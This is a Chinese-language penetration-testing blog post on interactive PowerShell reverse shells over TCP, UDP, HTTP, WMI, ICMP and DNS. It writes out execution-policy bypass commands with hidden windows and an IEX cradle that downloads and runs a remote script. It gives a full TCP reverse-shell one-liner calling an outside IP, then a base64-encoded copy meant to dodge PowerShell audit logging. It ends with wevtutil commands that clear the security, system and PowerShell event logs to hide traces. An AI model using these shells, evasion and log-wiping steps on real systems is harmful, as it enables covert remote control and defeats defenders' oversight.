0x00 前言

---

當我看了DM_牛發的http://zone.wooyun.org/content/20429，我的心情久久不能平靜，這本應屬於我的精華+WB，被他先發了，這娃真是可惡，可恨 ：-)，後來DM_牛又發了我一些資料讓我學習，我就寫了此文，剛入門，肯定有錯誤的地方，希望小夥伴們討論，指出。

這次Labofapenetrationtester是以"week of powershell shell"的形式放出來的，就是每天一篇，一共五篇，分別是

Day 1 - Interactive PowerShell shells over TCP
Day 2 - Interactive PowerShell shells over UDP
Day 3 - Interactive PowerShell shells over HTTP/HTTPS
Day 4 - Interactive PowerShell shells with WMI
Day 5 - Interactive PowerShell shells over ICMP and DNS

0x01 前三天

---

第一到三天的TCP,UDP,HTTP,HTTPS的反彈方法為： 把相應的PS1指令碼傳到目標機上，然後執行

#!bash
D:\>PowerShell.exe -ep Bypass -File d:\Invoke-PowerShellUdp.ps1

就會走不同的協議出來，我這裡演示的是UDP協議的，如圖

要先監聽埠，再反彈，否則會報錯。

實際環境攻擊的話，我常常還加-NoLogo -NonInteractive -NoProfile -WindowStyle Hidden引數，如下

#!bash
PowerShell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File d:\Invoke-PowerShellUdp.ps1

另一種玩法是如果對方通外網，可以直接用IEX下載遠端的PS1指令碼回來執行，

#!bash
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

0x02 Day 4 - Interactive PowerShell shells with WMI

---

這個通常只能用在內網，可以完全替代psexec了，作者這裡利用名稱空間來儲存WMI執行結果，最後再取回來回顯結果的思路非常贊，解決了WMI遠端直接命令沒有回顯的問題。當然執行這個指令碼需要管理員許可權，並且要輸入對方的賬號。

0x03 Day 5 - Interactive PowerShell shells over ICMP and DNS

這個指令碼執行，走ICMP協議的話，只需要注意一點，本地要先執行

#!bash
[email protected]:~/Desktop# sysctl -w net.ipv4.icmp_echo_ignore_all=1

否則反彈是無法用的，相信用過icmpsh的同學都知道。

後來有個老外BLOG說做如下配置，可以發現powershell攻擊行為以及看到攻擊程式碼

配置需求如下：

1. 在C:\Windows\System32\WindowsPowerShell\v1.0目錄下建立一個profiles.ps1

填寫如下內容

# !bash    
CD D:\ $LogCommandHealthEvent = $true $LogCommandLifecycleEvent = $true

1. 右鍵點選profile.ps1，一次點選“安全”->“高階”->“稽核”，點“編譯”按鈕，新增使用者“everyone”，開啟如圖所示的稽核項

1. 因為這樣做以後，日誌會變的很大，為了編碼回滾覆蓋，相應的增加下日誌的容量，如圖

怎麼能繞過這種防護呢？因為他加了對profile.ps1的檔案稽核，所以透過修改或者移動/刪除這個檔案的策略是走不通的。

當我們執行了反彈指令碼後，可以在“事件檢視器”裡的“windows powershell"的事件類裡，透過過濾eventID為500的事件看到細節

#!bash
CommandLine=$client = New-Object System.Net.Sockets.TCPClient("10.18.180.10",8888);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text language=".encoding"][/text]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

如圖：

剛開始我想透過-noprofile選項因該可以繞過這個限制，實踐後發現不行，還是會在日誌裡看到，然後我又配合用-enc選項進行base64編碼，操作如下：

#!bash
powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQA4AC4AMQA4ADAALgAxADgAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgAyADUANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA0ACgANAAoA

發現雖然日誌還是會有記錄，但是不會在CommandLine=裡看到指令碼程式碼的細節了,多多少少算一個進步(此刻感覺自己屌屌的)。

當然，最絕對的辦法，還是在目標上用完powershell後，來一下

#!bash
wevtutil cl "windows powershell"
wevtutil cl "security"
wevtutil cl "system"

當然如果許可權低，就沒辦法了：（

用powershell做攻擊的好處是顯而易見的，省去了免殺（我測試的時候是這樣的),方便傳輸（注入的時候），系統自帶（win7以後就支援了）。但是即使管理員不像上面這樣開啟稽核，預設還是有痕跡的，有機會下篇再細說。有喜歡滲透的小夥伴都加我討論，自己搞太慢了。

參考文章：

http://x0day.me/

http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html